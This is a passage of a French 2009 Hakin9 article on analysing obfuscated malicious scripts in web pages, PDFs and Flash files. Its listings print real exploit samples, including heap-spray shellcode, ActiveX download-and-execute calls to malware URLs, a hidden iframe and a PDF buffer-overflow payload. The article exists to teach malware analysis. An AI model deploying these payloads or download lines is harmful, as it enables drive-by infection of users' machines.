L'ancienne version de Mpack se trouvait parfois $700 pour le pack par dfaut, des modules supplmentaires pouvaient tre ajouts pour $50 $150 selon la popularit de l'application vise. Ces toolkits utilisent dsormais des couches par dfaut d'offusquation (au moins deux). De plus, il arrive que celle-ci soit faite en temps rel par le code PHP ; ainsi, chaque fois que vous demandez la page, vous obtenez une page chiffre diffremment! Nous pouvons dire que les scripts d'exploits sont donc server side polymorphique.

JavaScript Custom Decoder

Bien sr, rien n'empche les auteurs de script malicieux de crer leur propre fonction de codage, comme dans le script du Listing 4. Si vous regardez attentivement ce code, vous verrez que du code inutile

Figure 4. Sauter sur le bloc de donnes

2/2009 HAKIN9 51

48_49_50_51_52_53_54_55_56_57_58_Javascript.indd

51

2009-01-06, 19:17

TECHNIQUE
Listing 4. Fonction custom de dcodage
<html> <head> <Meta Name=Encoder Content=sina> <META HTTP-EQUIV="imagetoolbar" CONTENT="no"> <noscript> <iframe></iframe> </noscript> <script language="javascript"> <!-- cB62="BEvXycyX",vX19="BqXqy\"Hq";.7762511,vR37=".2422728",vX19= 'wi\$\(\-5\"Bv78M0g\+J\%\ \@V\;\)jSZ\\\#\&\*13\ <\r4db9Xx\?\,\{K\_6\]z\`T\} QloD\:Oy\~sAG\|nrfHe\/Ek\'\!FNRP2IqULu\>\n\=Yct\[\^pa\.CmhW', cB62='B7pw\) \$m2\.6\&i\n\|\/Cg8\\cA\'WN\%\;RTEq\?Fj\> L\<tv9K\^rDkIedPs\*\=yHO\[f\}0Z\:\"\rzX\] x3\-o4\@\{luGaJQ\+5\_SVYb\(\~1\#M\ h\,U\!\`n';function xQ94(fZ25){"BqqcEqEH", l=fZ25.length;'ULviQ\|e\?',w='';while(l--)"BwEycvqc", o=cB62.indexOf(fZ25.charAt(l)), 'Uvmm\?LLv',w=(o==-1?fZ25.charAt(l):vX19.charAt(o))+w; "BX\"qcHEw",cB62= cB62.substring(1)+cB62.charAt(0),document.write(w);'Uim\&i\&\&v'};xQ94( ~17Hz8kL\!w\'rX31SXz8\]hyZ3\*A\]Sz\~17Hz8k\!L\!w\'rLH\~S\!3z1\,Hz\ ~Hz1391\ !3zSbkL\!AZ31s7\!3HS1wmk\!L\!w\'m\^\&\n\n\'\*Ak\!L\!w\'A\*LH\~S\!3z1\ ,Hz\~Hz1391\!3zSbz3B8lSz\~17HzwmX31SXz8\]hyZ3m\ 'A\]Sz\~17Hz8kzL\!w3\'r7\] wLH\~S\!3z1\,yh\}3XZ\r\rB7zLHB\,Z7L3\<hX\'r7\]w3\,B\`7\~\`\{bq\ 'X31SXz8\]hyZ3A\ *\*A7\]wLH\~S\!3z1\,yh\}3XZ\'rLH\~S\!3z1\,\~h\ 1SX3o\.3z1Zwo\.3z1\,if5NoOfnu\ 'ALH\~S\!3z1\,Hz\!HSZ3LHBzbkzL\!A\*3yZ3rLH\~S\!3z1\,Hz\!HSZ3S\ bkzL\!A\*Ad\ :\?bqtq\?A\ \(I\&b\$tq\>A\]Sz\~17Hz8kLBZw\'rB7zLHB\,Z1h1SZ8b8m8mAZ31s7\ !3HS1wmkLBZw\'m\^q\n\n\'A\*AkLBZw\'ABf\&Jb\$\?\>qA\.\"\?\&bJ66\>A\] Sz\~17Hz8kLLZw\'r7\]wLH\~S\!3z1\,hyy\'rLH\~S\!3z1\,HzZ3y3\~1Z1hX1b\] Sz\~17Hz8w\'rX31SXz8\]hyZ3\*AZ31s7\!3HS1wmkLLZw\'m\^6\n\n\'\*\ *AkLLZw\'ASst\&b\?tqIABvq\nbt\n\$6A\!xq\$bqtqIA\}uIJb\?\n\$\$A9\:JJb\ >qt\&Az\ (\&6b\&qttALCtJbq\n\$\&AAky7\~3zZ3Lk1Hkbm\`S\}S\]3z\|mAF\-Z\~X7\ 1V")

Cette instruction retourne la fonction entire depuis laquelle cette instruction est appele, en gardant les espaces et sauts de lignes. Elle est souvent utilise pour dtecter toute modification du script original. Listing 20 (que vous trouverez sur le site http://www.hakin9.org/prt/view/ listings.html tlcharger parmi les autres listings du numro). Cette technique ralentit l'analyse, car si vous modifiez la fonction en y ajoutant des commandes de debug, vous modifiez aussi la cl qui sert dcoder la chane encode, vous obtiendrez donc un rsultat incomprhensible. L'astuce ici consiste trouver la cl et la hardcoder dans la variable de la cl (ici q17vcDYfM ). Pour cela, nous avons juste besoin d'ajouter un print(q17vcDYfM) aprs l'initialisation de q17vcDYfM et d'excuter le script dans un dbogueur. Nous obtenons la chane suivante :
FUNCTIONPP5OMP5LAVK6BQD4PIVARQ17VCDY

Un pige pour l'analyste : la fonction Argument.callee

FMARGUMENTSCALLEETOSTRINGREPLACE WGTOUPPERCASEPRINTQ17VCDYFMVAREY L6MWLW5...ALPYUAFDTK5

//--> </script> <sCRipT Language=JavascrIpT> xQ94("j3\*\nSYj34\"\[Y\>bj\n4\*\"\\n\#\#h\$\-5Vp6\ (\!OX\#\-X\#\$\*0h\-\\1OX\#\-X\#\( 2\#\-K\#on\#\`H\'\\1n\,\]\:\-\#\(\/tQF\?Q2Y\>bj\n4\*\ "\\1OX\#\-X\#\(2\n\%3\*\nS\\eU\|\|UQv\| \|UFFmL2\\X\,\`\-\(\r4G4a\"\*\}aYjo34\"\[Y\>bj\. \}\[\~Y\>bj\}\.g4\!\*\\p\<\(pX\:\#\,HH\\ 1H\,\:\:p\<\(1H\:p\<f\&i\"\.\[\!mv\$\[i4\&\$LL\[F\$v\ "\&e\$v\"\|v\?i\!mQ\.L\"Yjo\} \.g4\!\*Y\>bj\%\!a\+J\*Y\>b6\,\]\\\~4\#\~1g\:a\?\(2n\#\#hfoo\`\`\ `UKXptpU1O\`o\`\`U\-K\ -2\'\>bpX\:\#\,HHM2\[O7XHO\,\<\"X\<\+X\:\#\,HH2d\)\~4\#\~1g\:a\?W\'\ >bjo\%\!a\ +J\*Y\>bjo\.\}\[\~Yjo3\*\nSY\>b\>b") </script> </head> <body> <noscript> <b><font color=red>?????????Javascript????? !!!############</font></b> </noscript> </body> </html>

qui correspond la fonction pP5oMp5la o tous les caractres non alphanumriques ont t enlevs par l'utilisation de l'expression rgulire replace(/\W/g,' ') et transforms en majuscule par l'appel la mthode toUpperCase(). Cette chane peut tre nettoye pour devenir la cl de dcodage en enlevant le code ajout au pralable, nous devons donc supprimer PRINTQ17VCDYFM . Note : des scripts avancs utilisent une combinaison de argument.callee.
toString() + location.href;

La cl de dcodage dpend alors de l'emplacement de la page - l'URI. Pour dboguer ce genre de script, vous devez avoir l'adresse originale, remplacer comme expliqu ci-dessus l'argument.callee avec sa valeur et ensuite hardcoder l'adresse directement dans le script ou surcharger l'objet location dans votre environnement de debug.

52

HAKIN9 2/2009

48_49_50_51_52_53_54_55_56_57_58_Javascript.indd

52

2009-01-06, 19:17

SCRIPTS MALICIEUX

Listing 5. Fonction nettoye du dcoder custom

cB62="BEvXycyX",vX19="BqXqy\"Hq";.7762511,vR37=".2422728",vX19='wi\$\(\-5\"Bv78M0g\+J\%\ \@V\;\)jSZ\\\#\&\*13\<\r4db9Xx\?\, \{K\_6\]z\`T\}QloD\:Oy\~sAG\|nrfHe\/Ek\'\!FNRP2IqULu\>\n\=Yct\[\^pa\.CmhW',cB62='B7pw\)\$m2\.6\&i\n\|\/Cg8\\cA\ 'WN\%\;RTEq\?Fj\>L\<tv9K\^rDkIedPs\*\=yHO\[f\}0Z\:\"\rzX\]x3\-o4\@\{luGaJQ\+5\_SVYb\(\~1\#M\ h\,U\!\`n'; function xQ94(fZ25){"BqqcEqEH",l=fZ25.length;'ULviQ\|e\?',w='';while(l--)"BwEycvqc",o=cB62.indexOf(fZ25.charAt(l)),'Uvmm\?LLv', w=(o==-1?fZ25.charAt(l):vX19.charAt(o))+w;"BX\"qcHEw",cB62=cB62.substring(1)+cB62.charAt(0), document.write(w);'Uim\&i\&\&v'};xQ94 xQ94("j3\*\nSYj34\"\[Y\>bj\n4\*\"\\n\#\#h\$\-5Vp6\(\!OX\#\-X\#\$\*0h\-\\1OX\#\-X\#\(2\#\-K\#on\#\`H\'\\1n\,\]\:\-\#\(\/tQF\?Q2Y\>bj\ n4\*\"\\1OX\#\-X\#\(2\n\%3\*\nS\\eU\|\|UQv\|\|UFFmL2\\X\,\`\-\(\r4G4a\"\*\}aYjo34\"\[Y\>bj\.\}\[\~Y\>bj\}\.g4\ !\*\\p\<\(pX\:\#\,HH\\1H\,\:\:p\<\(1H\:p\<f\&i\"\.\[\!mv\$\[i4\&\$LL\[F\$v\"\&e\$v\"\|v\?i\!mQ\.L\"Yjo\}\.g4\!\ *Y\>bj\%\!a\+J\*Y\>b6\,\]\\\~4\#\~1g\:a\?\(2n\#\#hfoo\`\`\`UKXptpU1O\`o\`\`U\-K\-2\'\>bpX\:\#\,HHM2\[O7XHO\,\<\ "X\<\+X\:\#\,HH2d\)\~4\#\~1g\:a\?W\'\>bjo\%\!a\+J\*Y\>bjo\.\}\[\~Yjo3\*\nSY\>b\>b")

Listing 6. Le dcodeur custom en clair

<script language=javascript> kI35=4201;if(document.all) { function _dm() { return false }; function _mdm() { document.oncontextmenu=_dm;setTimeout("_mdm()",800) }; _mdm(); } document.oncontextmenu=new Function("return false"); function _ndm(e){ if(document.layers||window.sidebar){ if(e.which!=1)return false; } }; if(document.layers) { document.captureEvents(Event.MOUSEDOWN);document.onmousedown=_ndm; } else { document.onmouseup=_ndm; }; zA3=1913;pY68=5914; function _dws() { window.status = " ";setTimeout("_dws()",100); function _dds() { if(document.all) { document.onselectstart=function () { return false };setTimeout("_dds()",700) } }; _dds(); uT98=3916; wX10=9057; mH15=1916; yN62=3055; xA22=4198; nY87=8199; dJ92=1058;; _licensed_to_="huyufeng"; </script> <HTML> <HEAD> <META http-equiv=Content-Type content="text/html; charset=gb2312"> <META content="MSHTML 6.00.2900.3354" name=GENERATOR> </HEAD> <BODY> <OBJECT id=install classid=clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A></OBJECT> <SCRIPT> var YEtYcJsR1="http://xxx.xnibi.com/mm.exe"; install["DownloadAndInstall"](YEtYcJsR1); </SCRIPT> </BODY> </HTML>

2/2009 HAKIN9

53

48_49_50_51_52_53_54_55_56_57_58_Javascript.indd

53

2009-01-06, 19:17

TECHNIQUE
Ainsi, le code utilis pour dsoffusquer le script est prsent dans le Listing 7. L'appel la mthode eval dans la fonction pP5oMp5la a t remplac par un appel print . Listing 7. Insrer la cl
function pP5oMp5la(Vk6BQD4pI) { var q17vcDYfM="FUNCTIONPP5OM...XWA0EVALPYUAFDTK5"; var eYl6MWlW5; ... PyUafdtK5+=String.fromCharCode(VfrYI6V77); if(hec5KxXwa<EE7s4JBQo.length-1) { hec5KxXwa++;} else { hec5KxXwa=0; } } print(PyUafdtK5);

Nous obtenons alors le rsultat dans le Listing 8. Du code inutile a t ajout par la variable KoUXcxVN . Pour tre sr, il faudrait suivre le chemin vers l'autre page sur le mme serveur

ajout par ce script (setAttribute sur src) ; c'est pourquoi, comme prcis plus haut, il est vraiment important de connatre l'adresse d'un script pour tre en mesure d'approfondir l'analyse si besoin.

} pP5oMp5la('5250...424f');

Listing 8. Script final sans l'Argument.callee

var KoUXcxVN = 100; var b5SvqCxB = document.createElement("script"); KoUXcxVN--; b5SvqCxB.setAttribute("language", "JavaScript"); KoUXcxVN+=100; b5SvqCxB.setAttribute("src", "?t=1002614178" + "&n=-1447599003" + "&h=3993862835" + "&r=606868581" + "&"); document.body.appendChild(b5SvqCxB); KoUXcxVN=0;

Quelques auteurs de malwares empaquettent leurs scripts avec l'outil online fourni par Dean Edwards, il est facile de reconnatre ces scripts, ils commencent tous par la chane eval(function(p,a,c,k,e,d){ comme dans le Listing 9. Comme vous le voyez dans cet exemple, la chane est extraite du code original et mise la fin du script empaquet. Pour le dsoffusquer, remplacez l'appel de function eval() par la fonction print () et passez le script rsultant Rhino. Vous obtiendrez :
function CuteqqCn() {

La fonction packer de Dean Edwards

wwwcuteqqcn["Dloadds"]

("http://bbb.xxxx.com/

calc.cab", "calc.exe",0)

Listing 9. Exemple de code empaquet par le l'outil de Dean Edwards

<OBJECT ID="wwwcuteqqcn" Classid= "clsid:{A7F05EE4-0426-454F-8013-C41E3596E9E9}"> </OBJECT> <script> eval(function(p,a,c,k,e,d) { e=function(c) { return c.toString(36) }; if(!''.replace(/^/,String)){ while(c--){ d[c.toString(a)]=k[c]||c.toString(a) } k=[function(e) { return d[e] }]; e=function() { return'\\w+' }; c=1 }; while(c--){ if(k[c]) { p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]) } } return p } ('6 4(){ 3["2"]("5://b.7.a/1.9","1.8",0) } ',12,12,'|calc|Dloadds|wwwcuteqqcn|CuteqqCn|http |function|xxxx|exe|cab|com|bbb'.split('|'),0,{}))

Vous auriez pu aussi dterminer l'attaque en identifiant les chanes suspectes de la fin du script, mais il faut savoir quoi chercher. En regardant de plus prs le CLSID et le nom de la mthode Dloadds, vous verrez que cet exploit fait rfrence au CVE-2007-4105, il essaye d'crire l'insu de l'utilisateur un fichier tlcharg de http://bbb.xxxx.com/calc.cab. Pour vrifier que ce fichier est effectivement malicieux, vous pouvez le cross-scanner, il existe des services gratuits en ligne le permettant comme VirusTotal ou la sandbox de ThreatExpert.

Ce n'est pas une classe ou mthode Javascript ni Vbscript mais une fonctionnalit Microsoft. Microsoft Script Encoder tool screnc.exe a t cr par Microsoft en 2003, il a pour but d'encoder les scripts des pages pour prvenir toute modification. Cet outil de scurit a depuis t revers et quelques auteurs de scripts malicieux l'utilisent.

La fonctionnalit JS.encode

54

HAKIN9 2/2009

48_49_50_51_52_53_54_55_56_57_58_Javascript.indd

54

2009-01-06, 19:17

SCRIPTS MALICIEUX
Notez que ce code ne fonctionne qu'avec Microsoft Internet Explorer. Comment le dtecter ? L'attribut language de Javascript est renomm en Jscript.Encode et VBScript.Encode en VBScript. comme dans le Listing 10. La manire la plus simple de retrouver les donnes originales est d'utiliser la fonction de Malzilla Misc. Decoders Decode, JS.Encode. Vous pouvez aussi utiliser le code C du Listing 11 ou un des nombreux dcodeurs online.

Listing 10. Exemple utilisant JS.encode

<script language="JScript.Encode"> #@~^oAAAAA==Abx[Khc/YmY!d'EfGxBI[KmEsnxDRhMrO+vB@!kWDChPUlsn'l08,/ D^x'B4YD2=z&FGc 8R8f&cF0%JRrWJoWc4YsV-E~Ak9Y4'{ ~4kLtDxcOv~dDXVnx'B[kk2^lz=P Wx-E@*@!JkWDm:n@*E#@#@&XDIAAA==^#~@ </script>

Listing 11. Exemple de JS.encode en clair

<script language="Javascript"> window.status='Done';document.write('<iframe name=ea8b src=\'http://77.221.133.188/ .if/go.html\' width=72 height=496 style=\'display: none\'> </iframe>') </script>

Listing 12. Comment utiliser Javascript pour crire un fichier

<SCRIPT LANGUAGE="JavaScript"> function WriteToFile(str) { var fso = new ActiveXObject("Scripting.FileSystemObject"); var s = fso.CreateTextFile("c:\\test.txt", true); s.writeline(str); s.Close(); } </SCRIPT>

Listing 13. Code malicieux utilisant la fois du code Javascript et VBScript

<html> <body> <script language="JavaScript"> function mymid(ss) { return ss.substring(2); } </script> <script language="VBScript"> s="html" flag_type=s S="3C68...3E0D0a" D="" DO WHILE LEN(S)>1 k="&H" k=k+ucase(LEFT(S,2)) p=CLng(k) m=chr(p) D=D+m LOOP if flag_type="html" then document.write(D) end if if flag_type="vbs" then EXECUTE D end if </script> <script language="javaScript"> if (flag_type=="js") { var e; try { eval(D); } catch(e){} } </script> </body> </html>

Tout ce que nous avons vu jusqu' prsent utilise le langage cr par Netscape il y a quelques annes : Javascript. Cependant, comme vous devez le savoir, Microsoft a aussi fait son propre langage fond sur Visual Basic et appel VBScript. Microsoft Internet Explorer est le seul navigateur capable de comprendre Javascript et VBScript. Comme Microsoft est la premire cible des attaques, il est normal de voir des scripts malicieux utilisant cette technologie. Notez quil est possible de trouver des scripts utilisant les deux langages. Lautre point avantageux pour les auteurs de script malicieux et quil nexiste pas de dbogueur permettant de reproduire le comportement dun moteur VBScript. Quelles sont donc les solutions permettant de comprendre un script malicieux sans pour autant compromettre notre machine ? Vous pouvez convertir le code VB en JS mais il existe des mthodes plus simples et moins gnratrices d'erreurs, la mthode consiste utiliser un composant Microsoft ActiveX pour manuellement dboguer la couche d'offusquation tape par tape. Cette mthode est assez longue mais donne de bons rsultats. Le code cl est l'utilisation de la fonction WriteToFile base sur l'ActiveX Script ing.FileSystemObject, voir Listing 12. Ce code doit tre ajout dans le script que vous voulez dcoder. Il peut tre utilis pour crire n'importe quelle chane sur le disque dans le fichier par dfaut c:\test.txt. Nous allons prendre un exemple pour expliquer comment l'analyser en utilisant une mthode ActiveX dcrite ci-dessus, voir Listing 14 qui combine du code Javascript et du VBScript.
2/2009 HAKIN9 55

Scripts malicieux utilisant VBScript

48_49_50_51_52_53_54_55_56_57_58_Javascript.indd

55

2009-01-06, 19:18

TECHNIQUE
Listing 14. Script en clair qui utilisait du Javascript et VBScript
<html> <body> <script language="javascript">window.onerror=function(){return true;}</script> <object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2" style='display: none' id='target'></object> <SCRIPT language="javascript"> var url="%u7468%u7074%u2F3A%u772F%u7777%u312E%u7730%u7069%u632E%u6D6F%u792F%u 6861%u6F6F%u792F%u7365%u652E%u6578"; var el1s2kdo3r = "hi1265369"; var s1="%u9090%u9090"; ... var s23="%u6946%u656c%u0041"; var s=s1+s2+s3+s4+s5+s6+s7+s8+s9+s10+s11+s12+s13+s14+s15+s16+s17+s18+s19+s20+ s21+s22+s23+url; var shellcode = unescape(s); </script> <SCRIPT language="javascript"> var el1s2kdo3r = "hi1265369"; var ss="%u9090"; var bigblock = unescape(ss); var el1s2kdo3r = "hi1265369"; var headersize = 20; var el1s2kdo3r = "hi1265369"; var slackspace = headersize+shellcode.length; var el1s2kdo3r = "hi1265369"; while (bigblock.length<slackspace) bigblock+=bigblock; var el1s2kdo3r = "hi1265369"; fillblock = bigblock.substring(0, slackspace); var el1s2kdo3r = "hi1265369"; block = bigblock.substring(0, bigblock.length-slackspace); var el1s2kdo3r = "hi1265369"; while(block.length+slackspace<0x40000) block = block+block+fillblock; var el1s2kdo3r = "hi1265369"; memory = new Array(); var el1s2kdo3r = "hi1265369"; for (x=0; x<100; x++) memory[x] = block +shellcode; var el1s2kdo3r = "hi1265369"; var buffer = ''; var el1s2kdo3r = "hi1265369"; while (buffer.length < 1024) buffer+="\x05"; var el1s2kdo3r = "hi1265369"; var ok="1111"; var el1s2kdo3r = "hi1265369"; target.Register(ok,buffer); var el1s2kdo3r = "hi1265369"; </script> </body> </html>

Il faut tout d'abord identifier les deux tags script, l'un avec l'attribut langage JavaScript et l'autre VBScript, et ensuite la fonction nomme mymid dans le code Javascript qui est appele par le code VBScript. Nous devons identifier le flot d'excutions dans le code VBScript, la variable flag _ type est positionne html donc le script malicieux sera insr en utilisant le document.write qui suit. Nous devons donc ajouter la fonction WriteToFile dans le bloc de code Javascript et remplacer le document.write(D) par WriteToFile(D) (note: en VBScript il n'est pas ncessaire de terminer chaque ligne de code par un ';'). Vous obtenez alors le rsultat du Listing 14. Le script occasionne un composant ActiveX 7F5E27CE-4A5C-11D3-92320000B48A05B2 qui est le contrle ActiveX SSReader Pdg2, il embarque un shellcode, utilise une technique de Heap Spray pour remplir la heap et appelle une mthode nomme Register. En cherchant un peu, vous trouverez que la mthode Register est vulnrable un buffer overflow dans les anciennes versions de cet outil, comme dcrit dans CVE-2007-5807. Ce script essaie d'exploiter cette faille, la bonne nouvelle pour nous est que l'URL vers le virus peut tre rapidement identifie dans le code :

Listing 15. Extrait de fichier PDF malicieux

00000a80: 00000a90: 00000aa0: 00000ab0: 00000ac0: 00000ad0: 00000ae0: 00000ae0: 00000af0: ... 00000e80: 00000e90: 000011d0: 000011e0: 67 2f 74 ad 3e bb 9f 9f 34 ea 7a ea 74 74 46 72 5b 56 96 91 91 b3 22 36 f9 72 68 6c 65 90 b1 82 5f 5f 6a 5e 85 57 65 20 61 61 c1 0d 2c 18 18 d5 5f 6b 80 61 31 74 6d d7 92 19 e7 e7 54 dd 39 01 6d 38 65 0d 1c 6c ed 75 75 57 3d 6e 00 0d 34 44 0a 72 41 5a f7 f7 bf 39 27 8e 65 33 65 48 da 20 3e cc cc 7a 5d 09 e2 6e 2f 63 89 2c b1 18 f4 f4 f5 82 da aa 64 46 6f c4 04 8d 13 eb eb d1 9f f1 52 6f 69 64 57 a4 1d 72 d9 d9 3d dc cf 0d 62 6c 65 4d c8 42 0c ee ee ff cb c7 0a 6a 74 5d 6b b6 0e 81 9d 9d bc ff ee 65 0d 65 3e 1c 66 21 84 95 95 97 30 bd 6e 33 72 3e 47 77 46 9c b5 b5 2d 9e 96 64 34 5b 73 10 7a 12 92 21 21 8c 34 b3 73 20 gth 1843/Filter[ /FlateDecode]>>s tream..H..WMk.G. .[....r.,....fwz >V...lA ...B.!F. ...,..Z>..r..... .._..u.........! .._..u.........! 4.j.TW.z..=...-. ."^_.=9].....0.4 z6.k9n'......... ..W......R..ends tream.endobj.34

Figure 6. Fentre de configuration des breakpoints

56

HAKIN9 2/2009

48_49_50_51_52_53_54_55_56_57_58_Javascript.indd

56

2009-01-06, 19:18

SCRIPTS MALICIEUX
var url="%u7468%u7074%u2F3A

%u772F%u7777%u312E%u7730 %u7069%u632E%u6D6F%u792F %u6861%u6F6F%u792F%u7365 %u652E%u6578";

Vous pouvez utiliser soit les fonctions de Malzilla Misc. Decoders Decode UCS2 (%u) ou le Listing 5 que nous avions prsent pour obtenir l'addresse malicieuse : http:// www.10wip.com/yahoo/yes.exe.

indiqu dans les chapitres prcdents. Si une chane trop longue est passe cette mthode, un buffer overflow se produira dans les anciennes versions d'Acrobat Reader, vous trouverez quelques informations sur cette vulnrabilit rfrence par le CVE-2007-5659 et le CVE-2008-5663. Cette faille a t patche dans Acrobat Reader depuis la version 8.1.2.

Moteur de script d'Adobe Flash

Adobe Flash embarque un langage de script nomm ActionScript fond sur ECMAScript (comme Javascript). C'est un langage puissant qui a t utilis rcemment par des personnes malintentionnes (en 2008) pour rediriger les utilisateurs vers des sites compromis. Une des mthodes consiste

Comme nous l'avons dj dit, il y a de plus en plus de vulnrabilits fondes sur des fichiers malicieux utilisant des failles dans les moteurs Javascript d'outil comme Acrobat Reader. Si vous ditez le fichier, vous verrez le type MIME %PDF au dbut du fichier suivi dans le corps par le stream suivant /Filter/ FlateDecode. Note : il est aussi possible de trouver des samples contenant le code en clair. Le Listing 15 reprsente un extrait de fichier PDF malicieux. Pour extraire le code original du stream, vous pouvez utiliser le script Perl du Listing 16. Il prend un argument qui est le nom du fichier contenant le stream dzipper. Le stream zipp est le code apparaissant entre les tags /Filter/ FlateDecode et endstream.enobj. Vous devez aussi supprimer les 0x0d 0x0a du dbut et fin de stream. En utilisant ce script sur notre exemple, nous obtenons en rsultat le Listing 17. La variable sc qui contient le shellcode est utilise par la variable plin qui est passe la mthode Collab.collectEmailInfo si la version du viewer est plus grande ou gale 6.0 Pour savoir ce que le shellcode fait, vous pouvez le dboguer avec IDA comme

Faille dans le moteur PDF d'Acrobat Reader

Listing 16. Script permettant de dcoder des streams PDF

#!/usr/bin/perl use strict ; use warnings ; use Compress::Raw::Zlib; my $x = new Compress::Raw::Zlib::Inflate() or die "Cannot create a inflation stream\n" ; my $input = '' ; open(TEST, "<$ARGV[0]") or die "usage: $0 pdf_zip_stream_file"; binmode STDOUT; my ($output, $status) ; while (read(TEST, $input, 4096)) { $status = $x->inflate(\$input, $output) ; print $output if $status == Z_OK or $status == Z_STREAM_END ; last if $status != Z_OK ; } die "inflation failed\n" unless $status == Z_STREAM_END ; close TEST;

Listing 17. Code en clair du Javascript contenu dans le PDF

function re(count,what) { var v = ""; while (--count >= 0) v += what; return v; } function start() { sc = unescape("%u9090%u9090%u9090") + unescape("%u2DEB...%u5151"); if (app.viewerVersion >= 7.0) { plin = re(1008,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u0b0b%u0028%u0 aeb%u0aeb") + unescape("%u9090%u9090") + re(122,unescape("%u0b0b%u0028%u06eb%u06eb")) + sc + re(1256,unescape("%u4141%u4141")); } else { ef6 = unescape("%uf6eb%uf6eb") + unescape("%u0b0b%u0019"); plin = re(80,unescape("%u9090%u9090")) + sc + re(80,unescape("%u9090%u9090")) + unescape("%ue7e9%ufff9")+unescape("%uffff%uffff") + unescape("%uf6eb%uf4eb") + unescape("%uf2eb%uf1eb"); while ((plin.length % 8) != 0) plin = unescape("%u4141") + plin; plin += re(2626,ef6); } if (app.viewerVersion >= 6.0) { this.collabStore = Collab.collectEmailInfo({subj: "",msg: plin}); } } var shaft = app.setTimeOut("start()",10); //</ACRO_script> //</Page-Actions>

Figure 5. Bloc identique mais identifi comme code par IDA

2/2009 HAKIN9

57

48_49_50_51_52_53_54_55_56_57_58_Javascript.indd

57

2009-01-06, 19:18

TECHNIQUE
utiliser les commandes ActionScript qui sont reprsentes par le tag DoAction embarqu dans les frames. Si vous avez dj utilis un diteur hexadcimal pour ouvrir un fichier .swf, vous avez peut-tre vu qu'il existe deux formats qui sont identifiables par leur en-tte, les trois premiers octets identifient le format flash ainsi FWS est l'ancien format non compress et CWS identifie les fichiers compresss pour Adobe Flash version 8 minimum. Pour dcoder les fichiers flash, le plus simple est d'utiliser les outils gratuits existant comme swfdump flashm, vous pouvez voir un exemple de leur utilisation dans le Listing 18 et Listing 19. De ces deux listings, nous constatons que nos fichiers flash sont compresss et contiennent du code. DOACTION. Une fois ouvert le flash redirige la victime vers http://o7n9.cn/i.swf utilisant GetUrl2 comme nomm par swfdump ou loadMovie par flashm . Il

Sur Internet
Explication du Kill-bit: http://support.microsoft.com/kb/240797 Rhino: http://www.mozilla.org/rhino/ Malzilla: http://malzilla.sourceforge.net/ Encodeur Alpha: http://skypher.com/wiki/ index.php?title=ALPHA3 Prsentation d'Alexander Sotirov Black Hat 2007 http://www.blackhat.com/presentations/ bh-europe-07/Sotirov/Presentation/bheu-07-sotirov-apr19.pdf Heap Spray sur Wikipedia: http://en.wikipedia.org/wiki/Heap_spray Rfrence Linux System Call: http: //www.digilife.be/quickreferences/QRC/ LINUX%20System%20Call%20Quick%20R eference.pdf Empaqueteur de Dean Edward: http://dean.edwards.name/packer/ http://www.virustotal.com/ http://www.threatexpert.com/submit.aspx screnc.exe tool: http://www.microsoft.com/downloads/ details.aspx?familyid=E7877F67-C4474873-B1B0-21F0626A6329&displaylan g=en Dcodeur en C JS.encode : http://www.virtualconspiracy.com/ download/scrdec18.c Dcodeur online JS.encode: http://www.greymagic.com/security/ tools/decoder/

Listing 18. Dcodage de Flash en utilisant swfdump

# swfdump -D "4561.swf" [HEADER] File version: 8 [HEADER] File is zlib compressed. Ratio: 96% [HEADER] File size: 164 (Depacked) [HEADER] Frame rate: 12.000000 [HEADER] Frame count: 1 [HEADER] Movie width: 550.00 [HEADER] Movie height: 400.00 [045] 4 FILEATTRIBUTES [009] 3 SETBACKGROUNDCOLOR (ff/ff/ff) [018] 31 PROTECT [00c] 89 DOACTION 50 bytes) action: Constantpool(5 entries) String:"fVersion" String:"/: $version" String:"http://o7n9.cn/" String:"i.swf" String:"_root" ( 4 bytes) action: Push Lookup:0 ("fVersion") Lookup:1 ("/:$version") ( 0 bytes) action: GetVariable ( 0 bytes) action: DefineLocal ( 4 bytes) action: Push Lookup:2 ("http://o7n9.cn/") Lookup:0 ("fVersion") ( 0 bytes) action: GetVariable ( 0 bytes) action: Add2 ( 2 bytes) action: Push Lookup:3 ("i.swf") ( 0 bytes) action: Add2 ( 2 bytes) action: Push Lookup:4 ("_root") ( 0 bytes) action: GetVariable ( 1 bytes) action: GetUrl2 64 ( 0 bytes) action: Stop ( 0 bytes) action: End [001] 0 SHOWFRAME 1 (00:00:00,000)

serait hors sujet ici d'analyser cet autre script flash, mais pour votre information le fichier i.swf essaie d'exploiter une faille dans Defi neSceneAndFrameData pour excuter du code arbitraire (CVE-2007-0071).

Conclusion

Listing 19. Dcodage de Flash en utilisant flasm

#flasm -d 4561.swf movie '4561.swf' compressed // flash 8, total frames: 1, frame rate: 12 fps, 550x400 px protect '$1$jS$BoUofEQZlqjkrFp6L6z181' frame 0 constants 'fVersion', '/:$version', 'http://www.woai117.cn/', 'i.swf', '_root' push 'fVersion', '/:$version' getVariable varEquals push 'http://www.woai117.cn/', 'fVersion' getVariable push 'i.swf' add push '_root' getVariable loadMovie stop end // of frame 0 end

Dans ce document, nous avons fourni quelques astuces permettant de comprendre les scripts malicieux. Comme ce vecteur d'attaques devient de plus en plus important, il y a de grands risques que vous soyez un jour face l'un d'eux. C'est une bonne pratique de bloquer les ActiveX en utilisant des systmes de protection comme IPS/AV, mais il faut aussi dtecter les fichiers malicieux que ces vecteurs d'attaques tentent de tlcharger et d'excuter.

David Maciejak

David Maciejak travaille pour la socit Fortinet comme Security Researcher, son travail consiste suivre l'volution des menaces afin de fournir une solution prventive aux clients. Pour contacter l'auteur : David.Maciejak@gmail.com

58

HAKIN9 2/2009

48_49_50_51_52_53_54_55_56_57_58_Javascript.indd

58

2009-01-06, 19:18

SecureIP Solutions

La scurit de linformation est une chose importante pour les entreprises et mme pour les particuliers. Cest pourquoi SecureIP Solutions vous propose diffrents produits et services pour protger vos prcieuses donnes tels quun service de sauvegarde en ligne, les diffrents produits BitDefender et bien plus encore. http://www.secureip.ca

NUMERANCE

NUMERANCE, Spcialise dans la scurit informatique, intervient auprs des Petites et Moyennes Entreprises, en proposant des prestations daudit, daccompagnement, et de formation. http://www.numerance.fr

Herv Schauer Consultants

Pour plus de renseignement : hakin9@hakin9.org

